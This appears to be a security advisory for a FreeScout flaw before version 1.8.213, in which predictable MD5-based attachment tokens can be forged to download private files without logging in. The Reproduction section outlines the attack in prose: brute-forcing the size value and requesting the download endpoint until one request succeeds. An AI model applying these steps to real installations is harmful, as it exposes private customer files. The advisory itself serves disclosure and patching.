FreeScout Attachment Download Token Forgery Vulnerability Allowing Unauthenticated Access to Private Files

A vulnerability in FreeScout prior to version 1.8.213 allows unauthenticated attackers to download private attachments by exploiting a predictable token generation method. The tokens are created using a weak formula that combines the application key, attachment ID, and size, with the MD5 hash algorithm. Since the attachment IDs are sequential and the sizes can be brute-forced within a small range, attackers can forge valid tokens and access private files without any credentials.

Impact

This vulnerability allows for unauthorized access to private attachments, violating confidentiality and potentially breaching GDPR compliance.

Reproduction

To reproduce this vulnerability, first identify a target attachment ID. Then, brute-force the size parameter from 1 to approximately 50,000. For each size, calculate the MD5 hash token using the application key, attachment ID, and size. Finally, send a GET request to the attachment download endpoint, including the forged token. If the response is HTTP 200, a valid token has been found, and the file can be downloaded.

Remediation

Users should update to FreeScout version 1.8.213 or later, where this vulnerability has been fixed.